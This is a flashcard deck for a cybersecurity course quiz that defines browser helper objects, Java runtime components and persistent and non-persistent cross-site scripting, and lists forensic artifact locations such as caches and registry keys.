Module 3 - Attacks through Browsers and Add-on Modules Flashcards Preview

CYBF 646 - Quiz 2 > Module 3 - Attacks through Browsers and Add-on Modules > Flashcards

Flashcards in Module 3 - Attacks through Browsers and Add-on Modules Deck (17)
Loading flashcards...
1
Q

Browser Vulnerabilities

A
  • all have

- rely on users to upgrade to new versions and install patches

2
Q

Browser Helper Objects (BHOs)

A
  • extend functionality of browser, e.g. open PDFs, render graphics, play movies
  • popular as targets
  • not patched as often as browsers
3
Q

Access via Browser

A
  • intrusions launched through browsers and BHOs frequently have same level of permission as user account
4
Q

Browser Intrusion Artifacts (4)

A
  • internet cache
  • account temp directory
  • Windows registry
  • Java Runtime Environment (JRE) files
5
Q

Browser Attacks (method examples)

A
  • exploit configurations
  • change default home page
  • install toolbar
6
Q

IE Home Page Setting

A

\Software\Microsoft\Internet Explorer\Main\Start Page

7
Q

IE Add-ons

A

Internet Options

Manage Add-Ons

8
Q

Safari Extensions

A

Preferences

Extensions

9
Q

Java Runtime Environment (definition)

A

runtime portion of Java software (only thing needed to run Java via web browser)

10
Q

JRE (parts)

A
  • Java Virtual Machine (JVM)
  • Java platform core classes
  • Java platform libraries (supporting libraries)
11
Q

Java plug-in (definition)

A
  • component of JRE
  • allows applets written in Java to run inside browsers
  • not standalone program -> cannot be installed separately.
12
Q

XSS

A

Cross Site Scripting (both client and server)

  • loading attacked, 3rd party web app from unrelated attack site -> in manner that executes fragment of JavaScript prepared by attacker.
  • now also other modes of code injection, including ActiveX, Java, VBScript, Flash, or HTML scripts
13
Q

XSS Persistent

A
  • less common

- data (from attacker) saved by server and permanently displayed on “normal” pages without proper HTML escaping

14
Q

XSS non-persistent

A
  • more common
  • data provided by web client (HTML query parameters or form submissions) used by server-side scripts to parse and display results to user without properly sanitizing the request.
15
Q

Artifacts for XSS

A
  • emails (for links)
  • web page caches (for links)
  • web server logs
16
Q

Locations of browser caches

A

in profiles

17
Q

Artifacts for BHOs

A
  • registry (SOFTWARE\Classes\CSID ntuser.dat)

- JAR files (C:\Users\AppData\LocalLow\Sun\Java\Deployment\cache